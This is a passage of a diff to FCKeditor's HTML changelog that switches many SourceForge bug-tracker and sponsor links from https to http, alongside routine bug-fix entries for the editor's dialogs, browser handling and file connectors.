href="http://sourceforge.net/tracker/index.php?func=detail&aid=1556878&group_id=75348&atid=543653">SF BUG-1556878</a>] Firefox was creating empty tags when deleting the selection in some special cases.</li> <li>The context menu for links is now correctly shown when right-clicking on floating divs.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1084404&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1084404&group_id=75348&atid=543653">SF BUG-1084404</a>] The XHTML processor now ignores empty span tags.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1221728&group_id=75348&atid=543653">SF - BUG-1221728</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1174503&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1221728&group_id=75348&atid=543653">SF + BUG-1221728</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1174503&group_id=75348&atid=543653">SF BUG-1174503</a>] The <abbr> tag is not anymore getting broken by IE.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1182906&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1182906&group_id=75348&atid=543653">SF BUG-1182906</a>] IE is not anymore messing up mailto links.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1386094&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1386094&group_id=75348&atid=543653">SF BUG-1386094</a>] Fixed an issue when setting configuration options to empty ('') by code.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1389435&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1389435&group_id=75348&atid=543653">SF BUG-1389435</a>] Fixed an issue in some dialog boxes when handling numeric inputs.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1398829&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1398829&group_id=75348&atid=543653">SF BUG-1398829</a>] Some links may got broken on very specific cases. Fixed.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1409969&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1409969&group_id=75348&atid=543653">SF BUG-1409969</a>] <noscript> tags now remain untouched by the editor.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1433457&group_id=75348&atid=543653">SF - BUG-1433457</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1513631&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1433457&group_id=75348&atid=543653">SF + BUG-1433457</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1513631&group_id=75348&atid=543653">SF BUG-1513631</a>] Empty "href" attributes in <a> or empty "src" in <img> will now be correctly preserved.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1435195&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1435195&group_id=75348&atid=543653">SF BUG-1435195</a>] Scrollbars are now visible in the File Browser (for custom implementations).</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1438296&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1438296&group_id=75348&atid=543653">SF BUG-1438296</a>] The "ForceSimpleAmpersand" setting is now being honored in all tags.</li> <li>If a popup blocker blocks context menu operations, the correct alert message is displayed now, instead of a ugly JavaScript error.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1454116&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1454116&group_id=75348&atid=543653">SF BUG-1454116</a>] The GetXHTML() function will not change the IsDirty() value of the editor.</li> <li>The spell check may not work correctly when using SpellerPages with ColdFusion. Fixed.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1481861&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1481861&group_id=75348&atid=543653">SF BUG-1481861</a>] HTML comments are now removed by the Word Cleanup System.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1489390&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1489390&group_id=75348&atid=543653">SF BUG-1489390</a>] A few missing hard coded combo options used in some dialogs are now localizable.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1505448&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1505448&group_id=75348&atid=543653">SF BUG-1505448</a>] The Form dialog now retrieves the value of the "action" attribute exactly as defined in the source.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1517322&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1517322&group_id=75348&atid=543655">SF Patch-1517322</a>] Solved an issue when the toolbar has buttons with simple icons (usually used by plugins) mixed with icons coming from a strip (the default toolbar buttons).</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1575261&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1575261&group_id=75348&atid=543655">SF Patch-1575261</a>] Some fields in the Table and Cell Properties dialogs were being cut. Fixed.</li> <li>Fixed a startup compatibility issue with Firefox 1.0.4.</li> @@ -781,8 +781,8 @@ <li>Some fixes has been applied to the cell merging in Firefox.</li> </ul> <p> - * This version has been partially sponsored by <a href="https://www.footsteps.nl/">Footsteps</a> - and <a href="https://www.kentico.com/">Kentico</a>.</p> + * This version has been partially sponsored by <a href="http://www.footsteps.nl/">Footsteps</a> + and <a href="http://www.kentico.com/">Kentico</a>.</p> <h3> Version 2.3 Beta</h3> <p> @@ -868,7 +868,7 @@ are removed from that tag. </li> <li>Tables where not being created correctly on Opera. </li> <li>The XHTML processor will ignore invalid tags with names ending with ":", - like https:. </li> + like http:. </li> <li><span>On Firefox, the scrollbar is not anymore displayed on toolbar dropdown commands when not needed.</span> </li> <li><span>Some small fixes have being done to the dropdown commands rendering for FF</span>. @@ -908,7 +908,7 @@ <li>Small "lenght" type corrected in the select dialog window. Thanks to Bernd Nussbaumer.</li> <li>The about box is now showing correctly in Firefox 1.5.</li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1464020&group_id=75348&atid=543655">SF - Patch-1464020</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155793&group_id=75348&atid=543653">SF + Patch-1464020</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155793&group_id=75348&atid=543653">SF BUG-1155793</a>] The "Unlink" command is now working correctly under Firefox if you don't have a complete link selection. Thanks to Johnny Egeland.</li> <li>In the File Manager, it was not possible to upload files to folders with ampersands @@ -916,7 +916,7 @@ <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1178359&group_id=75348&atid=543653">SF BUG-1178359</a>] Elements from the toolbar are not anymore draggable in the editing area.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1487544&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1487544&group_id=75348&atid=543653">SF BUG-1487544</a>] Fixed a small issue in the code formatter for <br /> and <hr /> tags.</li> <li>The "Background Color" command now works correctly when the GeckoUseSPAN setting @@ -926,10 +926,10 @@ the color you prefer. </li> </ul> <p> - * This version has been partially sponsored by <a href="https://www.footsteps.nl/">Footsteps</a> - and <a href="https://www.kentico.com/">Kentico</a>. + * This version has been partially sponsored by <a href="http://www.footsteps.nl/">Footsteps</a> + and <a href="http://www.kentico.com/">Kentico</a>. <br /> - ** This version has been partially sponsored by <a href="https://www.nextide.ca/">Nextide</a>.</p> + ** This version has been partially sponsored by <a href="http://www.nextide.ca/">Nextide</a>.</p> <h3> Version 2.2</h3> <p> @@ -984,8 +984,8 @@ copy it to newer installations and upgrades. </li> <li><strong><font color="#ff0000">Attention</font></strong>: The "<strong>mcpuk</strong>" file browser has been removed from the package. We have no ways to support it. There - were also some licensing issues with it. Its web site can still be found at <a href="https://mcpuk.net/fbxp/"> - https://mcpuk.net/fbxp/</a>. </li> + were also some licensing issues with it. Its web site can still be found at <a href="http://mcpuk.net/fbxp/"> + http://mcpuk.net/fbxp/</a>. </li> <li>It is now possible to set different CSS styles for the chars in the Special Chars dialog window by adding the "SpecialCharsOut" and "SpecialCharsOver" in the "fck_dialog.css" skin file.* </li> @@ -1085,7 +1085,7 @@ of FCKeditor will not me rendered now, even if they will still be working correctly. </li> <li>It is now possible to allow cut/copy/past operations on Firefox using the <a - href="https://kb.mozillazine.org/Granting_JavaScript_access_to_the_clipboard" + href="http://kb.mozillazine.org/Granting_JavaScript_access_to_the_clipboard" target="_blank">user.js</a> file. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1336792&group_id=75348&atid=543653">SF BUG-1336792</a>] A fix has been applied to the XHTML processor to allow tag names @@ -1237,7 +1237,7 @@ it from plugins.</li> </ul> <p> - * This version has been partially sponsored by <a target="_blank" href="https://www.alkacon.com"> + * This version has been partially sponsored by <a target="_blank" href="http://www.alkacon.com"> Alkacon Software</a>.</p> <h3> Version 2.1.1</h3> @@ -1272,7 +1272,7 @@ the ProcessHTMLEntities setting.</li> </ul> <p> - * This version has been partially sponsored by <a target="_blank" href="https://www.acttive.com.br/"> + * This version has been partially sponsored by <a target="_blank" href="http://www.acttive.com.br/"> Acctive Software S.A.</a>.</p> <h3> Version 2.1</h3> @@ -1311,8 +1311,8 @@ it. </li> <li>A new test case has been added that shows how to set the editor background dynamically without using a CSS. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155906&group_id=75348&atid=543653">SF - BUG-1155906</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1110116&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155906&group_id=75348&atid=543653">SF + BUG-1155906</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1110116&group_id=75348&atid=543653">SF BUG-1110116</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1216332&group_id=75348&atid=543653">SF BUG-1216332</a>] The "AutoDetectPasteFromWord" configuration option is back (IE only feature). </li> @@ -1365,12 +1365,12 @@ <p> Fixed Bugs:</p> <ul> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1253255&group_id=75348&atid=543653">SF - BUG-1253255</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1253255&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1253255&group_id=75348&atid=543653">SF + BUG-1253255</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1253255&group_id=75348&atid=543653">SF BUG-1265520</a>] Due to changes on version 2.0, the anchor list was not anymore visible in the link dialog window. It has been fixed. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1242979&group_id=75348">SF - BUG-1242979</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1251354&group_id=75348&atid=543653">SF + BUG-1242979</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1251354&group_id=75348&atid=543653">SF BUG-1251354</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1256178&group_id=75348&atid=543653">SF BUG-1256178</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1274841&group_id=75348&atid=543653">SF BUG-1274841</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1303949&group_id=75348&atid=543653">SF @@ -1411,11 +1411,11 @@ Patch-1287070</a> ] In the Universal Keyboard, the Arabic keystrokes translator is now working with Firefox. Thanks again to Abdul-Aziz Al-Oraij. </li> <li>The editor now handles AJAX requests with HTTP status 304. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1157780&group_id=75348&atid=543653">SF - BUG-1157780</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1229077&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1157780&group_id=75348&atid=543653">SF + BUG-1157780</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1229077&group_id=75348&atid=543653">SF BUG-1229077</a>] Weird comments are now handled correctly (ignored on some cases). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155774&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155774&group_id=75348&atid=543653">SF BUG-1155774</a>] A spelling error in the Bulleted List Properties dialog has been corrected. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1272018&group_id=75348&atid=543653">SF @@ -1424,7 +1424,7 @@ <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1263161&group_id=75348&atid=543653">SF BUG-1263161</a>] A small fix has been applied to the sampleposteddata.php file. Thanks to Mike Wallace. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1241504&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1241504&group_id=75348&atid=543653">SF BUG-1241504</a>] The editor now looks also for the ID of the hidden linked field. </li> <li>The caption property on tables is now working on Gecko. Thanks to Helen Somers (Goss @@ -1485,7 +1485,7 @@ the controls. </li> <li>A much better support for Word pasting operations has been introduced. Now it uses a dialog box, in this way we have better results and more control.** </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1225372&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1225372&group_id=75348&atid=543655">SF Patch-1225372</a>] A small change has been done to the PHP integration file. The generic __construct constructor has been added for better PHP 5 sub-classing compatibility (backward compatible). Thanks to Marcus Bointon.</li> @@ -1496,18 +1496,18 @@ <li>ATTENTION: Some security changes have been made to the connectors. Now you must explicitly enable the connector you want to use. Please test your application before deploying this update. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1211591">SF - BUG-1211591</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1204273&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1211591">SF + BUG-1211591</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1204273&group_id=75348&atid=543653">SF BUG-1204273</a>] The connectors have been changed so it is not possible to use ".." on directory names. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1219734&group_id=75348&atid=543655">SF - Patch-1219734</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1219728&group_id=75348&atid=543653">SF - BUG-1219728</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1208654&group_id=75348&atid=543653">SF - BUG-1208654</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1205442&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1219734&group_id=75348&atid=543655">SF + Patch-1219734</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1219728&group_id=75348&atid=543653">SF + BUG-1219728</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1208654&group_id=75348&atid=543653">SF + BUG-1208654</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1205442&group_id=75348&atid=543653">SF BUG-1205442</a>] There was an error in the page unload on some cases that has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1209708">SF - BUG-1209708</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1214125">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1209708">SF + BUG-1209708</a>] [<a target="_blank" href="http://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1214125">SF BUG-1214125</a>] The undo on IE is now working correctly when the user starts typing. </li> <li>The preview now loads "Full Page" editing correctly. It also uses the @@ -1515,70 +1515,70 @@ <li>The "Templates" dialog was not working on some very specific (and strange) occasions over IE. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1199631&group_id=75348">SF - BUG-1199631</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1171944&group_id=75348&atid=543653">SF + BUG-1199631</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1171944&group_id=75348&atid=543653">SF BUG-1171944</a>] A new option is available to avoid a bad IE behavior that shows the horizontal scrollbar even when not needed. You can now force the vertical scrollbar to be always visible. Just set the "IEForceVScroll" configuration option to "true". Thanks to Grant Bartlett. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1212026&group_id=75348&atid=543655">SF Patch-1212026</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1228860&group_id=75348&atid=543653">SF - BUG-1228860</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1211775&group_id=75348&atid=543653">SF - BUG-1211775</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1199824">SF + BUG-1228860</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1211775&group_id=75348&atid=543653">SF + BUG-1211775</a>] [<a target="_blank" href="http://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1199824">SF BUG-1199824</a>] An error in the Packager has been corrected. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1163669">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1163669">SF BUG-1163669</a>] The XHTML processor now adds a space before the closing slash of tags that don't have a closing tag, like <br />. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1213733&group_id=75348&atid=543653">SF - BUG-1213733</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1216866&group_id=75348&atid=543653">SF - BUG-1216866</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1209673&group_id=75348&atid=543653">SF - BUG-1209673</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155454&group_id=75348&atid=543653">SF - BUG-1155454</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1187936&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1213733&group_id=75348&atid=543653">SF + BUG-1213733</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1216866&group_id=75348&atid=543653">SF + BUG-1216866</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1209673&group_id=75348&atid=543653">SF + BUG-1209673</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155454&group_id=75348&atid=543653">SF + BUG-1155454</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1187936&group_id=75348&atid=543653">SF BUG-1187936</a> ] Now, on Gecko, the source is opened in a dialog window to avoid fatal errors (Gecko bugs). </li> <li>Some pages have been changed to avoid importing errors on Plone. Thanks to Arthur Kalmenson. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1171606&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1171606&group_id=75348&atid=543653">SF BUG-1171606</a>] There is a bug on IE that makes the editor to not work if the instance name matches a meta tag name. Fixed. </li> <li>On Firefox, the source code is now opened in a dialog box, to avoid error on pages with more than one editor. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1225703&group_id=75348&atid=543655">SF - Patch-1225703</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1214941&group_id=75348&atid=543653">SF + Patch-1225703</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1214941&group_id=75348&atid=543653">SF BUG-1214941</a>] The "ForcePasteAsPlainText" configuration option is now working correctly on Gecko browsers. Thanks to Manuel Polo. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1228836&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1228836&group_id=75348&atid=543653">SF BUG-1228836</a>] The "Show Table Borders" feature is now working on Gecko browsers. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1212529&group_id=75348&atid=543655">SF - Patch-1212529</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1212517&group_id=75348&atid=543653">SF + Patch-1212529</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1212517&group_id=75348&atid=543653">SF BUG-1212517</a>] The default File Browser now accepts connectors with querystring parameters (with "?"). Thanks to Tomas Jucius. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1233318&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1233318&group_id=75348&atid=543653">SF BUG-1233318</a>] A JavaScript error thrown when using the Print command has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1229696&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1229696&group_id=75348&atid=543653">SF BUG-1229696</a>] A regular expression has been escaped to avoid problems when opening the code in some editors. It has been moved to a dialog window. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1231978&group_id=75348&atid=543653">SF - BUG-1231978</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1228939&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1231978&group_id=75348&atid=543653">SF + BUG-1231978</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1228939&group_id=75348&atid=543653">SF BUG-1228939</a>] The Preview window is now using the Content Type and Base href. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1232056&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1232056&group_id=75348&atid=543653">SF BUG-1232056</a>] The anchor icon is now working correctly on IE. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1232056&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1232056&group_id=75348&atid=543653">SF BUG-1202468</a>] The anchor icon is now available on Gecko too. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1236279&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1236279&group_id=75348&atid=543653">SF BUG-1236279</a>] A security warning has been corrected when using the File Browser over HTTPS. </li> <li>The ASP implementation now avoid errors when setting the editor value to null values. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1237359&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1237359&group_id=75348&atid=543653">SF BUG-1237359</a>] The trailing <BR> added by Gecko at the end of the source is now removed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1170828">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1170828">SF BUG-1170828</a>] No more &nbsp; is added to the source when using the "New Page" button. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1165264&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1165264&group_id=75348&atid=543653">SF BUG-1165264</a>] A new configuration option has been included to force the editor to ignore empty paragraph values (<p>&nbsp;</p>), returning empty (""). </li> @@ -1586,48 +1586,48 @@ </li> <li>The <TD> tags are now included in the FillEmptyBlocks configuration handling. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1224829&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1224829&group_id=75348&atid=543653">SF BUG-1224829</a>] A small bug in the "Find" dialog has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1221307&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1221307&group_id=75348&atid=543653">SF BUG-1221307</a>] A small bug in the "Image" dialog has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1219981&group_id=75348&atid=543653">SF - BUG-1219981</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155726&group_id=75348&atid=543653">SF - BUG-1155726</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1178473&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1219981&group_id=75348&atid=543653">SF + BUG-1219981</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155726&group_id=75348&atid=543653">SF + BUG-1155726</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1178473&group_id=75348&atid=543653">SF BUG-1178473</a>] It is handling the <FORM>, <TEXTAREA> and <SELECT> tags "name" attribute correctly. Thanks to thc33. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1205403&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1205403&group_id=75348&atid=543653">SF BUG-1205403</a>] The checkbox and radio button values are now handled correctly in their dialog windows. Thanks to thc33. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1236626&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1236626&group_id=75348&atid=543653">SF BUG-1236626</a>] The toolbar now doesn't need to collapse when unloading the page (IE only). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1212559&group_id=75348&atid=543653">SF - BUG-1212559</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1017231&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1212559&group_id=75348&atid=543653">SF + BUG-1212559</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1017231&group_id=75348&atid=543653">SF BUG-1017231</a>] The "Save" button now calls the "onsubmit" event before posting the form. The submit can be cancelled if the onsubmit returns "false". </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1215823&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1215823&group_id=75348&atid=543653">SF BUG-1215823</a>] The editor now works correctly on Firefox if it values is set to "<p></p>". </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1217546&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1217546&group_id=75348&atid=543653">SF BUG-1217546</a>] No error is thrown when "pasting as plain text" and no text is available for pasting (as an image for example). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1207031&group_id=75348&atid=543653">SF - BUG-1207031</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1223978">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1207031&group_id=75348&atid=543653">SF + BUG-1207031</a>] [<a target="_blank" href="http://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1223978">SF 